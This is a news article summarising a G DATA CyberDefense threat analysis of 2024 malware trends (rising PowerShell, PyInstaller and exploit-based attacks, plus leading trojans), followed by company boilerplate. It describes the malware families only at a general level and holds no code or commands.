A threat analysis by G DATA CyberDefense shows that ransomware remains a major threat. At the same time, cybercriminals are increasingly using PowerShell and PyInstaller in their attacks. Vulnerabilities in applications and operating systems are also a popular attack vector.
Even though law enforcement agencies have disrupted cybercriminals' infrastructures in 2024, for example, during Operations "Endgame" and "Power Off," cybercriminals continue to find ways to infiltrate IT systems. This doesn't require new malware. They are evolving existing attack tools and combining various tools. The experts at G DATA CyberDefense have evaluated current threat data. The analysis shows that attack vectors such as information stealers are declining. However, other attack methods have increased:
PowerShell attacks have increased by 127 percent
SocGholish and ChromeLoader, in particular, were used very frequently by cybercriminals last year. SocGholish, also known as FakeUpdates, has been used by several cybercrime groups since 2017. The malware is a downloader that communicates via HTTP. The malicious software disguises itself as a fake browser update.
ChromeLoader is a persistent browser hijacker that modifies the settings of the affected browser and redirects internet traffic to advertising sites. Disguised as a browser extension, the malware spreads via an ISO file that pretends to be a cracked video game, pirated movie, or TV series to trick users into opening the file.
Python attacks have increased more than sixfold
Attackers rely on PyInstaller-based malware that converts Python files to EXEs. One reason for its popularity is that it's easy to write code in PyInstaller. Particularly widespread is ChromePyJacker – a malware that infiltrates Chrome to load advertisements.
G DATA security experts recorded a 110 percent increase in exploit-based attacks. Cyber gangs exploit vulnerabilities in operating systems and applications to inject malware and compromise systems. It's striking that exploits are still being used for attacks that are several years old and for which patches are available, such as in Microsoft Office. Criminals rely on the fact that important security updates have not been installed.
Trojans and RATs
Urelas takes the top spot – a Trojan for data theft and espionage. It targets Windows operating systems and features sophisticated obfuscation techniques that make it difficult to detect and analyze. Newcomer Gamarue spreads as a worm via portable storage media such as USB sticks, using Windows shortcut files. Imperium, another newcomer, takes third place. The stealer and keylogger's special feature: It is metamorphic and continuously modifies its own code. Furthermore, metamorphic malware is capable of completely transforming the internal structure of a computer system with each new infection.
While remote access Trojans, in particular, were repeatedly represented in the top 10 in previous years, the picture for 2024 is diverse, with very different types of malware such as backdoors, stealers, and botnets. One explanation for the ranking: attackers combine different malware to increase profits. Another striking feature: some malware families have been active for a very long time, such as Buterat (since 2011) or Salgorea (since 2018). This is a sign that malware developers are constantly evolving the malware.
More at GData.de
About G Data With comprehensive cyber defense services, the inventor of the anti-virus enables companies to defend themselves against cybercrime. Over 500 employees ensure the digital security of companies and users. Made in Germany: With over 30 years of expertise in malware analysis, G DATA conducts research and software development exclusively in Germany. The highest standards of data protection are paramount. In 2011, G DATA issued a “no backdoor” guarantee with the “IT Security Made in Germany” seal of trust from TeleTrust eV. G DATA offers a portfolio from anti-virus and endpoint protection to penetration tests and incident response to forensic analyzes, security status checks and cyber awareness training to defend companies effectively. New technologies such as DeepRay use artificial intelligence to protect against malware. Service and support are part of the G DATA campus in Bochum. G DATA solutions are available in 90 countries and have received numerous awards.